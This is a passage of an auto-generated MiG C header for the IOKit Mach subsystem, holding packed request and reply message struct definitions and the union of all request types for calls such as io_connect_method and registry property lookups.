mach_msg_type_number_t matchingCnt; 2043 | } __Request__io_service_match_property_table_ool_t; 2044 | #ifdef __MigPackStructs 2045 | #pragma pack() 2046 | #endif 2047 | 2048 | #ifdef __MigPackStructs 2049 | #pragma pack(4) 2050 | #endif 2051 | typedef struct { 2052 | mach_msg_header_t Head; 2053 | /* start of the kernel processed data */ 2054 | mach_msg_body_t msgh_body; 2055 | mach_msg_ool_descriptor_t matching; 2056 | mach_msg_port_descriptor_t wake_port; 2057 | /* end of the kernel processed data */ 2058 | NDR_record_t NDR; 2059 | mach_msg_type_number_t notification_typeOffset; /* MiG doesn't use it */ 2060 | mach_msg_type_number_t notification_typeCnt; 2061 | char notification_type[128]; 2062 | mach_msg_type_number_t matchingCnt; 2063 | mach_msg_type_number_t referenceCnt; 2064 | io_user_reference_t reference[8]; 2065 | } __Request__io_service_add_notification_ool_t; 2066 | #ifdef __MigPackStructs 2067 | #pragma pack() 2068 | #endif 2069 | 2070 | #ifdef __MigPackStructs 2071 | #pragma pack(4) 2072 | #endif 2073 | typedef struct { 2074 | mach_msg_header_t Head; 2075 | NDR_record_t NDR; 2076 | mach_msg_type_number_t obj_nameOffset; /* MiG doesn't use it */ 2077 | mach_msg_type_number_t obj_nameCnt; 2078 | char obj_name[128]; 2079 | } __Request__io_object_get_superclass_t; 2080 | #ifdef __MigPackStructs 2081 | #pragma pack() 2082 | #endif 2083 | 2084 | #ifdef __MigPackStructs 2085 | #pragma pack(4) 2086 | #endif 2087 | typedef struct { 2088 | mach_msg_header_t Head; 2089 | NDR_record_t NDR; 2090 | mach_msg_type_number_t obj_nameOffset; /* MiG doesn't use it */ 2091 | mach_msg_type_number_t obj_nameCnt; 2092 | char obj_name[128]; 2093 | } __Request__io_object_get_bundle_identifier_t; 2094 | #ifdef __MigPackStructs 2095 | #pragma pack() 2096 | #endif 2097 | 2098 | #ifdef __MigPackStructs 2099 | #pragma pack(4) 2100 | #endif 2101 | typedef struct { 2102 | mach_msg_header_t Head; 2103 | /* start of the kernel processed data */ 2104 | mach_msg_body_t msgh_body; 2105 | mach_msg_port_descriptor_t owningTask; 2106 | mach_msg_ool_descriptor_t properties; 2107 | /* end of the kernel processed data */ 2108 | NDR_record_t NDR; 2109 | uint32_t connect_type; 2110 | NDR_record_t ndr; 2111 | mach_msg_type_number_t propertiesCnt; 2112 | } __Request__io_service_open_extended_t; 2113 | #ifdef __MigPackStructs 2114 | #pragma pack() 2115 | #endif 2116 | 2117 | #ifdef __MigPackStructs 2118 | #pragma pack(4) 2119 | #endif 2120 | typedef struct { 2121 | mach_msg_header_t Head; 2122 | /* start of the kernel processed data */ 2123 | mach_msg_body_t msgh_body; 2124 | mach_msg_port_descriptor_t into_task; 2125 | /* end of the kernel processed data */ 2126 | NDR_record_t NDR; 2127 | uint32_t memory_type; 2128 | mach_vm_address_t address; 2129 | mach_vm_size_t size; 2130 | uint32_t flags; 2131 | } __Request__io_connect_map_memory_into_task_t; 2132 | #ifdef __MigPackStructs 2133 | #pragma pack() 2134 | #endif 2135 | 2136 | #ifdef __MigPackStructs 2137 | #pragma pack(4) 2138 | #endif 2139 | typedef struct { 2140 | mach_msg_header_t Head; 2141 | /* start of the kernel processed data */ 2142 | mach_msg_body_t msgh_body; 2143 | mach_msg_port_descriptor_t from_task; 2144 | /* end of the kernel processed data */ 2145 | NDR_record_t NDR; 2146 | uint32_t memory_type; 2147 | mach_vm_address_t address; 2148 | } __Request__io_connect_unmap_memory_from_task_t; 2149 | #ifdef __MigPackStructs 2150 | #pragma pack() 2151 | #endif 2152 | 2153 | #ifdef __MigPackStructs 2154 | #pragma pack(4) 2155 | #endif 2156 | typedef struct { 2157 | mach_msg_header_t Head; 2158 | NDR_record_t NDR; 2159 | uint32_t selector; 2160 | mach_msg_type_number_t scalar_inputCnt; 2161 | uint64_t scalar_input[16]; 2162 | mach_msg_type_number_t inband_inputCnt; 2163 | char inband_input[4096]; 2164 | mach_vm_address_t ool_input; 2165 | mach_vm_size_t ool_input_size; 2166 | mach_msg_type_number_t inband_outputCnt; 2167 | mach_msg_type_number_t scalar_outputCnt; 2168 | mach_vm_address_t ool_output; 2169 | mach_vm_size_t ool_output_size; 2170 | } __Request__io_connect_method_t; 2171 | #ifdef __MigPackStructs 2172 | #pragma pack() 2173 | #endif 2174 | 2175 | #ifdef __MigPackStructs 2176 | #pragma pack(4) 2177 | #endif 2178 | typedef struct { 2179 | mach_msg_header_t Head; 2180 | /* start of the kernel processed data */ 2181 | mach_msg_body_t msgh_body; 2182 | mach_msg_port_descriptor_t wake_port; 2183 | /* end of the kernel processed data */ 2184 | NDR_record_t NDR; 2185 | mach_msg_type_number_t referenceCnt; 2186 | uint64_t reference[8]; 2187 | uint32_t selector; 2188 | mach_msg_type_number_t scalar_inputCnt; 2189 | uint64_t scalar_input[16]; 2190 | mach_msg_type_number_t inband_inputCnt; 2191 | char inband_input[4096]; 2192 | mach_vm_address_t ool_input; 2193 | mach_vm_size_t ool_input_size; 2194 | mach_msg_type_number_t inband_outputCnt; 2195 | mach_msg_type_number_t scalar_outputCnt; 2196 | mach_vm_address_t ool_output; 2197 | mach_vm_size_t ool_output_size; 2198 | } __Request__io_connect_async_method_t; 2199 | #ifdef __MigPackStructs 2200 | #pragma pack() 2201 | #endif 2202 | 2203 | #ifdef __MigPackStructs 2204 | #pragma pack(4) 2205 | #endif 2206 | typedef struct { 2207 | mach_msg_header_t Head; 2208 | } __Request__io_registry_entry_get_registry_entry_id_t; 2209 | #ifdef __MigPackStructs 2210 | #pragma pack() 2211 | #endif 2212 | 2213 | #ifdef __MigPackStructs 2214 | #pragma pack(4) 2215 | #endif 2216 | typedef struct { 2217 | mach_msg_header_t Head; 2218 | NDR_record_t NDR; 2219 | uint32_t selector; 2220 | mach_msg_type_number_t scalar_inputCnt; 2221 | uint64_t scalar_input[16]; 2222 | mach_msg_type_number_t inband_inputCnt; 2223 | char inband_input[4096]; 2224 | mach_vm_address_t ool_input; 2225 | mach_vm_size_t ool_input_size; 2226 | mach_msg_type_number_t inband_outputCnt; 2227 | mach_msg_type_number_t scalar_outputCnt; 2228 | } __Request__io_connect_method_var_output_t; 2229 | #ifdef __MigPackStructs 2230 | #pragma pack() 2231 | #endif 2232 | 2233 | #ifdef __MigPackStructs 2234 | #pragma pack(4) 2235 | #endif 2236 | typedef struct { 2237 | mach_msg_header_t Head; 2238 | NDR_record_t NDR; 2239 | mach_msg_type_number_t matchingOffset; /* MiG doesn't use it */ 2240 | mach_msg_type_number_t matchingCnt; 2241 | char matching[512]; 2242 | } __Request__io_service_get_matching_service_t; 2243 | #ifdef __MigPackStructs 2244 | #pragma pack() 2245 | #endif 2246 | 2247 | #ifdef __MigPackStructs 2248 | #pragma pack(4) 2249 | #endif 2250 | typedef struct { 2251 | mach_msg_header_t Head; 2252 | /* start of the kernel processed data */ 2253 | mach_msg_body_t msgh_body; 2254 | mach_msg_ool_descriptor_t matching; 2255 | /* end of the kernel processed data */ 2256 | NDR_record_t NDR; 2257 | mach_msg_type_number_t matchingCnt; 2258 | } __Request__io_service_get_matching_service_ool_t; 2259 | #ifdef __MigPackStructs 2260 | #pragma pack() 2261 | #endif 2262 | 2263 | #ifdef __MigPackStructs 2264 | #pragma pack(4) 2265 | #endif 2266 | typedef struct { 2267 | mach_msg_header_t Head; 2268 | } __Request__io_service_get_authorization_id_t; 2269 | #ifdef __MigPackStructs 2270 | #pragma pack() 2271 | #endif 2272 | 2273 | #ifdef __MigPackStructs 2274 | #pragma pack(4) 2275 | #endif 2276 | typedef struct { 2277 | mach_msg_header_t Head; 2278 | NDR_record_t NDR; 2279 | uint64_t authorization_id; 2280 | } __Request__io_service_set_authorization_id_t; 2281 | #ifdef __MigPackStructs 2282 | #pragma pack() 2283 | #endif 2284 | 2285 | #ifdef __MigPackStructs 2286 | #pragma pack(4) 2287 | #endif 2288 | typedef struct { 2289 | mach_msg_header_t Head; 2290 | } __Request__io_server_version_t; 2291 | #ifdef __MigPackStructs 2292 | #pragma pack() 2293 | #endif 2294 | 2295 | #ifdef __MigPackStructs 2296 | #pragma pack(4) 2297 | #endif 2298 | typedef struct { 2299 | mach_msg_header_t Head; 2300 | } __Request__io_registry_entry_get_properties_bin_t; 2301 | #ifdef __MigPackStructs 2302 | #pragma pack() 2303 | #endif 2304 | 2305 | #ifdef __MigPackStructs 2306 | #pragma pack(4) 2307 | #endif 2308 | typedef struct { 2309 | mach_msg_header_t Head; 2310 | NDR_record_t NDR; 2311 | mach_msg_type_number_t planeOffset; /* MiG doesn't use it */ 2312 | mach_msg_type_number_t planeCnt; 2313 | char plane[128]; 2314 | mach_msg_type_number_t property_nameOffset; /* MiG doesn't use it */ 2315 | mach_msg_type_number_t property_nameCnt; 2316 | char property_name[128]; 2317 | uint32_t options; 2318 | } __Request__io_registry_entry_get_property_bin_t; 2319 | #ifdef __MigPackStructs 2320 | #pragma pack() 2321 | #endif 2322 | 2323 | #ifdef __MigPackStructs 2324 | #pragma pack(4) 2325 | #endif 2326 | typedef struct { 2327 | mach_msg_header_t Head; 2328 | NDR_record_t NDR; 2329 | mach_msg_type_number_t matchingCnt; 2330 | char matching[4096]; 2331 | } __Request__io_service_get_matching_service_bin_t; 2332 | #ifdef __MigPackStructs 2333 | #pragma pack() 2334 | #endif 2335 | 2336 | #ifdef __MigPackStructs 2337 | #pragma pack(4) 2338 | #endif 2339 | typedef struct { 2340 | mach_msg_header_t Head; 2341 | NDR_record_t NDR; 2342 | mach_msg_type_number_t matchingCnt; 2343 | char matching[4096]; 2344 | } __Request__io_service_get_matching_services_bin_t; 2345 | #ifdef __MigPackStructs 2346 | #pragma pack() 2347 | #endif 2348 | 2349 | #ifdef __MigPackStructs 2350 | #pragma pack(4) 2351 | #endif 2352 | typedef struct { 2353 | mach_msg_header_t Head; 2354 | NDR_record_t NDR; 2355 | mach_msg_type_number_t matchingCnt; 2356 | char matching[4096]; 2357 | } __Request__io_service_match_property_table_bin_t; 2358 | #ifdef __MigPackStructs 2359 | #pragma pack() 2360 | #endif 2361 | 2362 | #ifdef __MigPackStructs 2363 | #pragma pack(4) 2364 | #endif 2365 | typedef struct { 2366 | mach_msg_header_t Head; 2367 | /* start of the kernel processed data */ 2368 | mach_msg_body_t msgh_body; 2369 | mach_msg_port_descriptor_t wake_port; 2370 | /* end of the kernel processed data */ 2371 | NDR_record_t NDR; 2372 | mach_msg_type_number_t notification_typeOffset; /* MiG doesn't use it */ 2373 | mach_msg_type_number_t notification_typeCnt; 2374 | char notification_type[128]; 2375 | mach_msg_type_number_t matchingCnt; 2376 | char matching[4096]; 2377 | mach_msg_type_number_t referenceCnt; 2378 | io_user_reference_t reference[8]; 2379 | } __Request__io_service_add_notification_bin_t; 2380 | #ifdef __MigPackStructs 2381 | #pragma pack() 2382 | #endif 2383 | 2384 | #ifdef __MigPackStructs 2385 | #pragma pack(4) 2386 | #endif 2387 | typedef struct { 2388 | mach_msg_header_t Head; 2389 | NDR_record_t NDR; 2390 | mach_msg_type_number_t planeOffset; /* MiG doesn't use it */ 2391 | mach_msg_type_number_t planeCnt; 2392 | char plane[128]; 2393 | } __Request__io_registry_entry_get_path_ool_t; 2394 | #ifdef __MigPackStructs 2395 | #pragma pack() 2396 | #endif 2397 | 2398 | #ifdef __MigPackStructs 2399 | #pragma pack(4) 2400 | #endif 2401 | typedef struct { 2402 | mach_msg_header_t Head; 2403 | /* start of the kernel processed data */ 2404 | mach_msg_body_t msgh_body; 2405 | mach_msg_ool_descriptor_t path_ool; 2406 | /* end of the kernel processed data */ 2407 | NDR_record_t NDR; 2408 | mach_msg_type_number_t pathOffset; /* MiG doesn't use it */ 2409 | mach_msg_type_number_t pathCnt; 2410 | char path[4096]; 2411 | mach_msg_type_number_t path_oolCnt; 2412 | } __Request__io_registry_entry_from_path_ool_t; 2413 | #ifdef __MigPackStructs 2414 | #pragma pack() 2415 | #endif 2416 | #endif /* !__Request__iokit_subsystem__defined */ 2417 | 2418 | /* union of all requests */ 2419 | 2420 | #ifndef __RequestUnion__iokit_subsystem__defined 2421 | #define __RequestUnion__iokit_subsystem__defined 2422 | union __RequestUnion__iokit_subsystem { 2423 | __Request__io_object_get_class_t Request_io_object_get_class; 2424 | __Request__io_object_conforms_to_t Request_io_object_conforms_to; 2425 | __Request__io_iterator_next_t Request_io_iterator_next; 2426 | __Request__io_iterator_reset_t Request_io_iterator_reset; 2427 | __Request__io_service_get_matching_services_t Request_io_service_get_matching_services; 2428 | __Request__io_registry_entry_get_property_t Request_io_registry_entry_get_property; 2429 | __Request__io_registry_create_iterator_t Request_io_registry_create_iterator; 2430 | __Request__io_registry_iterator_enter_entry_t Request_io_registry_iterator_enter_entry; 2431 | __Request__io_registry_iterator_exit_entry_t Request_io_registry_iterator_exit_entry; 2432 | __Request__io_registry_entry_from_path_t Request_io_registry_entry_from_path; 2433 | __Request__io_registry_entry_get_name_t Request_io_registry_entry_get_name; 2434 | __Request__io_registry_entry_get_properties_t Request_io_registry_entry_get_properties; 2435 | __Request__io_registry_entry_get_property_bytes_t Request_io_registry_entry_get_property_bytes; 2436 | __Request__io_registry_entry_get_child_iterator_t Request_io_registry_entry_get_child_iterator; 2437 | __Request__io_registry_entry_get_parent_iterator_t Request_io_registry_entry_get_parent_iterator; 2438 | __Request__io_service_close_t Request_io_service_close; 2439 | __Request__io_connect_get_service_t Request_io_connect_get_service; 2440 | __Request__io_connect_set_notification_port_t Request_io_connect_set_notification_port; 2441 | __Request__io_connect_map_memory_t Request_io_connect_map_memory; 2442 | __Request__io_connect_add_client_t Request_io_connect_add_client; 2443 | __Request__io_connect_set_properties_t Request_io_connect_set_properties; 2444 | __Request__io_connect_method_scalarI_scalarO_t Request_io_connect_method_scalarI_scalarO; 2445 | __Request__io_connect_method_scalarI_structureO_t Request_io_connect_method_scalarI_structureO; 2446 | __Request__io_connect_method_scalarI_structureI_t Request_io_connect_method_scalarI_structureI; 2447 | __Request__io_connect_method_structureI_structureO_t Request_io_connect_method_structureI_structureO; 2448 | __Request__io_registry_entry_get_path_t Request_io_registry_entry_get_path; 2449 | __Request__io_registry_get_root_entry_t Request_io_registry_get_root_entry; 2450 | __Request__io_registry_entry_set_properties_t Request_io_registry_entry_set_properties; 2451 | __Request__io_registry_entry_in_plane_t Request_io_registry_entry_in_plane; 2452 | __Request__io_object_get_retain_count_t Request_io_object_get_retain_count; 2453 | __Request__io_service_get_busy_state_t Request_io_service_get_busy_state; 2454 | __Request__io_service_wait_quiet_t Request_io_service_wait_quiet; 2455 | __Request__io_registry_entry_create_iterator_t Request_io_registry_entry_create_iterator; 2456 | __Request__io_iterator_is_valid_t Request_io_iterator_is_valid; 2457 | __Request__io_catalog_send_data_t Request_io_catalog_send_data; 2458 | __Request__io_catalog_terminate_t Request_io_catalog_terminate; 2459 | __Request__io_catalog_get_data_t Request_io_catalog_get_data; 2460 | __Request__io_catalog_get_gen_count_t Request_io_catalog_get_gen_count; 2461 | __Request__io_catalog_module_loaded_t Request_io_catalog_module_loaded; 2462 | __Request__io_catalog_reset_t Request_io_catalog_reset; 2463 | __Request__io_service_request_probe_t Request_io_service_request_probe; 2464 | __Request__io_registry_entry_get_name_in_plane_t Request_io_registry_entry_get_name_in_plane; 2465 | __Request__io_service_match_property_table_t Request_io_service_match_property_table; 2466 | __Request__io_async_method_scalarI_scalarO_t Request_io_async_method_scalarI_scalarO; 2467 | __Request__io_async_method_scalarI_structureO_t Request_io_async_method_scalarI_structureO; 2468 | __Request__io_async_method_scalarI_structureI_t Request_io_async_method_scalarI_structureI; 2469 | __Request__io_async_method_structureI_structureO_t Request_io_async_method_structureI_structureO; 2470 | __Request__io_service_add_notification_t Request_io_service_add_notification; 2471 | __Request__io_service_add_interest_notification_t Request_io_service_add_interest_notification; 2472 | __Request__io_service_acknowledge_notification_t Request_io_service_acknowledge_notification; 2473 | __Request__io_connect_get_notification_semaphore_t Request_io_connect_get_notification_semaphore; 2474 | __Request__io_connect_unmap_memory_t Request_io_connect_unmap_memory; 2475 | __Request__io_registry_entry_get_location_in_plane_t Request_io_registry_entry_get_location_in_plane; 2476 | __Request__io_registry_entry_get_property_recursively_t Request_io_registry_entry_get_property_recursively; 2477 | __Request__io_service_get_state_t Request_io_service_get_state; 2478 | __Request__io_service_get_matching_services_ool_t Request_io_service_get_matching_services_ool; 2479 | __Request__io_service_match_property_table_ool_t Request_io_service_match_property_table_ool; 2480 | __Request__io_service_add_notification_ool_t Request_io_service_add_notification_ool; 2481 | __Request__io_object_get_superclass_t Request_io_object_get_superclass; 2482 | __Request__io_object_get_bundle_identifier_t Request_io_object_get_bundle_identifier; 2483 | __Request__io_service_open_extended_t Request_io_service_open_extended; 2484 | __Request__io_connect_map_memory_into_task_t Request_io_connect_map_memory_into_task; 2485 | __Request__io_connect_unmap_memory_from_task_t Request_io_connect_unmap_memory_from_task; 2486 | __Request__io_connect_method_t Request_io_connect_method; 2487 | __Request__io_connect_async_method_t Request_io_connect_async_method; 2488 | __Request__io_registry_entry_get_registry_entry_id_t Request_io_registry_entry_get_registry_entry_id; 2489 | __Request__io_connect_method_var_output_t Request_io_connect_method_var_output; 2490 | __Request__io_service_get_matching_service_t Request_io_service_get_matching_service; 2491 | __Request__io_service_get_matching_service_ool_t Request_io_service_get_matching_service_ool; 2492 | __Request__io_service_get_authorization_id_t Request_io_service_get_authorization_id; 2493 | __Request__io_service_set_authorization_id_t Request_io_service_set_authorization_id; 2494 | __Request__io_server_version_t Request_io_server_version; 2495 | __Request__io_registry_entry_get_properties_bin_t Request_io_registry_entry_get_properties_bin; 2496 | __Request__io_registry_entry_get_property_bin_t Request_io_registry_entry_get_property_bin; 2497 | __Request__io_service_get_matching_service_bin_t Request_io_service_get_matching_service_bin; 2498 | __Request__io_service_get_matching_services_bin_t Request_io_service_get_matching_services_bin; 2499 | __Request__io_service_match_property_table_bin_t Request_io_service_match_property_table_bin; 2500 | __Request__io_service_add_notification_bin_t Request_io_service_add_notification_bin; 2501 | __Request__io_registry_entry_get_path_ool_t Request_io_registry_entry_get_path_ool; 2502 | __Request__io_registry_entry_from_path_ool_t Request_io_registry_entry_from_path_ool; 2503 | }; 2504 | #endif /* !__RequestUnion__iokit_subsystem__defined */ 2505 | /* typedefs for all replies */ 2506 | 2507 | #ifndef __Reply__iokit_subsystem__defined 2508 | #define __Reply__iokit_subsystem__defined 2509 | 2510 | #ifdef __MigPackStructs 2511 | #pragma pack(4) 2512 | #endif 2513 | typedef struct { 2514 | mach_msg_header_t Head; 2515 | NDR_record_t NDR; 2516 | kern_return_t RetCode; 2517 | mach_msg_type_number_t classNameOffset; /* MiG doesn't use it */ 2518 | mach_msg_type_number_t classNameCnt; 2519 | char className[128]; 2520 | } __Reply__io_object_get_class_t; 2521 | #ifdef __MigPackStructs 2522 | #pragma pack() 2523 | #endif 2524 | 2525 | #ifdef __MigPackStructs 2526 | #pragma pack(4) 2527 | #endif 2528 | typedef struct { 2529 | mach_msg_header_t Head; 2530 | NDR_record_t NDR; 2531 | kern_return_t RetCode; 2532 | boolean_t conforms; 2533 | } __Reply__io_object_conforms_to_t; 2534 | #ifdef __MigPackStructs 2535 | #pragma pack() 2536 | #endif 2537 | 2538 | #ifdef __MigPackStructs 2539 | #pragma pack(4) 2540 | #endif 2541 | typedef struct { 2542 | mach_msg_header_t Head; 2543 | /* start of the kernel processed data */ 2544 | mach_msg_body_t msgh_body; 2545 | mach_msg_port_descriptor_t object; 2546 | /* end of the kernel processed data */ 2547 | } __Reply__io_iterator_next_t; 2548 | #ifdef __MigPackStructs 2549 | #pragma pack() 2550 | #endif 2551 | 2552 | #ifdef __MigPackStructs 2553 | #pragma pack(4) 2554 | #endif 2555 | typedef struct { 2556 | mach_msg_header_t Head; 2557 | NDR_record_t NDR; 2558 | kern_return_t RetCode; 2559 | } __Reply__io_iterator_reset_t; 2560 | #ifdef __MigPackStructs 2561 | #pragma pack() 2562 | #endif 2563 | 2564 | #ifdef __MigPackStructs 2565 | #pragma pack(4) 2566 | #endif 2567 | typedef struct { 2568 | mach_msg_header_t Head; 2569 | /* start of the kernel processed data */ 2570 | mach_msg_body_t msgh_body; 2571 | mach_msg_port_descriptor_t existing; 2572 | /* end of the kernel processed data */ 2573 | } __Reply__io_service_get_matching_services_t; 2574 | #ifdef __MigPackStructs 2575 | #pragma pack() 2576 | #endif 2577 | 2578 | #ifdef __MigPackStructs 2579 | #pragma pack(4) 2580 | #endif 2581 | typedef struct { 2582 | mach_msg_header_t Head; 2583 | /* start of the kernel processed data */ 2584 | mach_msg_body_t msgh_body; 2585 | mach_msg_ool_descriptor_t properties; 2586 | /* end of the kernel processed data */ 2587 | NDR_record_t NDR; 2588 | mach_msg_type_number_t propertiesCnt; 2589 | } __Reply__io_registry_entry_get_property_t; 2590 | #ifdef __MigPackStructs 2591 | #pragma pack() 2592 | #endif 2593 | 2594 | #ifdef __MigPackStructs 2595 | #pragma pack(4) 2596 | #endif 2597 | typedef struct { 2598 | mach_msg_header_t Head; 2599 | /* start of the kernel processed data */ 2600 | mach_msg_body_t msgh_body; 2601 | mach_msg_port_descriptor_t iterator; 2602 | /* end of the kernel processed data */ 2603 | } __Reply__io_registry_create_iterator_t; 2604 | #ifdef __MigPackStructs 2605 | #pragma pack() 2606 | #endif 2607 | 2608 | #ifdef __MigPackStructs 2609 | #pragma pack(4) 2610 | #endif 2611 | typedef struct { 2612 | mach_msg_header_t Head; 2613 | NDR_record_t NDR; 2614 | kern_return_t RetCode; 2615 | } __Reply__io_registry_iterator_enter_entry_t; 2616 | #ifdef __MigPackStructs 2617 | #pragma pack() 2618 | #endif 2619 | 2620 | #ifdef __MigPackStructs 2621 | #pragma pack(4) 2622 | #endif 2623 | typedef struct { 2624 | mach_msg_header_t Head; 2625 | NDR_record_t NDR; 2626 | kern_return_t RetCode; 2627 | } __Reply__io_registry_iterator_exit_entry_t; 2628 | #ifdef __MigPackStructs 2629 | #pragma pack() 2630 | #endif 2631 | 2632 | #ifdef __MigPackStructs 2633 | #pragma pack(4) 2634 | #endif 2635 | typedef struct { 2636 | mach_msg_header_t Head; 2637 | /* start of the kernel processed data */ 2638 | mach_msg_body_t msgh_body; 2639 | mach_msg_port_descriptor_t registry_entry; 2640 | /* end of the kernel processed data */ 2641 | } __Reply__io_registry_entry_from_path_t; 2642 | #ifdef __MigPackStructs 2643 | #pragma pack() 2644 | #endif 2645 | 2646 | #ifdef __MigPackStructs 2647 | #pragma pack(4) 2648 | #endif 2649 | typedef struct { 2650 | mach_msg_header_t Head; 2651 | NDR_record_t NDR; 2652 | kern_return_t RetCode; 2653 | mach_msg_type_number_t nameOffset; /* MiG doesn't use it */ 2654 | mach_msg_type_number_t nameCnt; 2655 | char name[128]; 2656 | } __Reply__io_registry_entry_get_name_t; 2657 | #ifdef __MigPackStructs 2658 | #pragma pack() 2659 | #endif 2660 | 2661 | #ifdef __MigPackStructs 2662 | #pragma pack(4) 2663 | #endif 2664 | typedef struct { 2665 | mach_msg_header_t Head; 2666 | /* start of the kernel processed data */ 2667 | mach_msg_body_t msgh_body; 2668 | mach_msg_ool_descriptor_t properties; 2669 | /* end of the kernel processed data */ 2670 | NDR_record_t NDR; 2671 | mach_msg_type_number_t propertiesCnt; 2672 | } __Reply__io_registry_entry_get_properties_t; 2673 | #ifdef __MigPackStructs 2674 | #pragma pack() 2675 | #endif 2676 | 2677 | #ifdef __MigPackStructs 2678 | #pragma pack(4) 2679 | #endif 2680 | typedef struct { 2681 | mach_msg_header_t Head; 2682 | NDR_record_t NDR; 2683 | kern_return_t RetCode; 2684 | mach_msg_type_number_t dataCnt; 2685 | char data[4096]; 2686 | } __Reply__io_registry_entry_get_property_bytes_t; 2687 | #ifdef __MigPackStructs 2688 | #pragma pack() 2689 | #endif 2690 | 2691 | #ifdef __MigPackStructs 2692 | #pragma pack(4) 2693 | #endif 2694 | typedef struct { 2695 | mach_msg_header_t Head; 2696 | /* start of the kernel processed data */ 2697 | mach_msg_body_t msgh_body; 2698 | mach_msg_port_descriptor_t iterator; 2699 | /* end of the kernel processed data */ 2700 | } __Reply__io_registry_entry_get_child_iterator_t; 2701 | #ifdef __MigPackStructs 2702 | #pragma pack() 2703 | #endif 2704 | 2705 | #ifdef __MigPackStructs 2706 | #pragma pack(4) 2707 | #endif 2708 | typedef struct { 2709 | mach_msg_header_t Head; 2710 | /* start of the kernel processed data */ 2711 | mach_msg_body_t msgh_body; 2712 | mach_msg_port_descriptor_t iterator; 2713 | /* end of the kernel processed data */ 2714 | } __Reply__io_registry_entry_get_parent_iterator_t; 2715 | #ifdef __MigPackStructs 2716 | #pragma pack() 2717 | #endif 2718 | 2719 | #ifdef __MigPackStructs 2720 | #pragma pack(4) 2721 | #endif 2722 | typedef struct { 2723 | mach_msg_header_t Head; 2724 | NDR_record_t NDR; 2725 | kern_return_t RetCode; 2726 | } __Reply__io_service_close_t; 2727 | #ifdef __MigPackStructs 2728 | #pragma pack() 2729 | #endif 2730 | 2731 | #ifdef __MigPackStructs 2732 | #pragma pack(4) 2733 | #endif 2734 | typedef struct { 2735 | mach_msg_header_t Head; 2736 | /* start of the kernel processed data */ 2737 | mach_msg_body_t msgh_body; 2738 | mach_msg_port_descriptor_t service; 2739 | /* end of the kernel processed data */ 2740 | } __Reply__io_connect_get_service_t; 2741 | #ifdef __MigPackStructs 2742 | #pragma pack() 2743 | #endif 2744 | 2745 | #ifdef __MigPackStructs 2746 | #pragma pack(4) 2747 | #endif 2748 | typedef struct { 2749 | mach_msg_header_t Head; 2750 | NDR_record_t NDR; 2751 | kern_return_t RetCode; 2752 | } __Reply__io_connect_set_notification_port_t; 2753 | #ifdef __MigPackStructs 2754 | #pragma pack() 2755 | #endif 2756 | 2757 | #ifdef __MigPackStructs 2758 | #pragma pack(4) 2759 | #endif 2760 | typedef struct { 2761 | mach_msg_header_t Head; 2762 | NDR_record_t NDR; 2763 | kern_return_t RetCode; 2764 | vm_address_t address; 2765 | vm_size_t size; 2766 | } __Reply__io_connect_map_memory_t; 2767 | #ifdef __MigPackStructs 2768 | #pragma pack() 2769 | #endif 2770 | 2771 | #ifdef __MigPackStructs 2772 | #pragma pack(4) 2773 | #endif 2774 | typedef struct { 2775 | mach_msg_header_t Head; 2776 | NDR_record_t NDR; 2777 | kern_return_t RetCode; 2778 | } __Reply__io_connect_add_client_t; 2779 | #ifdef __MigPackStructs 2780 | #pragma pack() 2781 | #endif 2782 | 2783 | #ifdef __MigPackStructs 2784 | #pragma pack(4) 2785 | #endif 2786 | typedef struct { 2787 | mach_msg_header_t Head; 2788 | NDR_record_t NDR; 2789 | kern_return_t RetCode; 2790 | kern_return_t result; 2791 | } __Reply__io_connect_set_properties_t; 2792 | #ifdef __MigPackStructs 2793 | #pragma pack() 2794 | #endif 2795 | 2796 | #ifdef __MigPackStructs 2797 | #pragma pack(4) 2798 | #endif 2799 | typedef struct { 2800 | mach_msg_header_t Head; 2801 | NDR_record_t NDR; 2802 | kern_return_t RetCode; 2803 | mach_msg_type_number_t outputCnt; 2804 | io_user_scalar_t output[16]; 2805 | } __Reply__io_connect_method_scalarI_scalarO_t; 2806 | #ifdef __MigPackStructs 2807 | #pragma pack() 2808 | #endif 2809 | 2810 | #ifdef __MigPackStructs 2811 | #pragma pack(4) 2812 | #endif 2813 | typedef struct { 2814 | mach_msg_header_t Head; 2815 | NDR_record_t NDR; 2816 | kern_return_t RetCode; 2817 | mach_msg_type_number_t outputCnt; 2818 | char output[4096]; 2819 | } __Reply__io_connect_method_scalarI_structureO_t; 2820 | #ifdef __MigPackStructs 2821 | #pragma pack() 2822 | #endif 2823 | 2824 | #ifdef __MigPackStructs 2825 | #pragma pack(4) 2826 | #endif 2827 | typedef struct { 2828 | mach_msg_header_t Head; 2829 | NDR_record_t NDR; 2830 | kern_return_t RetCode; 2831 | } __Reply__io_connect_method_scalarI_structureI_t; 2832 | #ifdef __MigPackStructs 2833 | #pragma pack() 2834 | #endif 2835 | 2836 | #ifdef __MigPackStructs 2837 | #pragma pack(4) 2838 | #endif 2839 | typedef struct { 2840 | mach_msg_header_t Head; 2841 | NDR_record_t NDR; 2842 | kern_return_t RetCode; 2843 | mach_msg_type_number_t outputCnt; 2844 | char output[4096]; 2845 | } __Reply__io_connect_method_structureI_structureO_t; 2846 | #ifdef __MigPackStructs 2847 | #pragma pack() 2848 | #endif 2849 | 2850 | #ifdef __MigPackStructs 2851 | #pragma pack(4) 2852 | #endif 2853 | typedef struct { 2854 | mach_msg_header_t Head; 2855 | NDR_record_t NDR; 2856 | kern_return_t RetCode; 2857 | mach_msg_type_number_t pathOffset; /* MiG doesn't use it */ 2858 | mach_msg_type_number_t pathCnt; 2859 | char path[512]; 2860 | } __Reply__io_registry_entry_get_path_t; 2861 | #ifdef __MigPackStructs 2862 | #pragma pack() 2863 | #endif 2864 | 2865 | #ifdef __MigPackStructs 2866 | #pragma pack(4) 2867 | #endif 2868 | typedef struct { 2869 | mach_msg_header_t Head; 2870 | /* start of the kernel processed data */ 2871 | mach_msg_body_t msgh_body; 2872 | mach_msg_port_descriptor_t root; 2873 | /* end of the kernel processed data */ 2874 | } __Reply__io_registry_get_root_entry_t; 2875 | #ifdef __MigPackStructs 2876 | #pragma pack() 2877 | #endif 2878 | 2879 | #ifdef __MigPackStructs 2880 | #pragma pack(4) 2881 | #endif 2882 | typedef struct { 2883 | mach_msg_header_t Head; 2884 | NDR_record_t NDR; 2885 | kern_return_t RetCode; 2886 | kern_return_t result; 2887 | } __Reply__io_registry_entry_set_properties_t; 2888 | #ifdef __MigPackStructs 2889 | #pragma pack() 2890 | #endif 2891 | 2892 | #ifdef __MigPackStructs 2893 | #pragma pack(4) 2894 | #endif 2895 | typedef struct { 2896 | 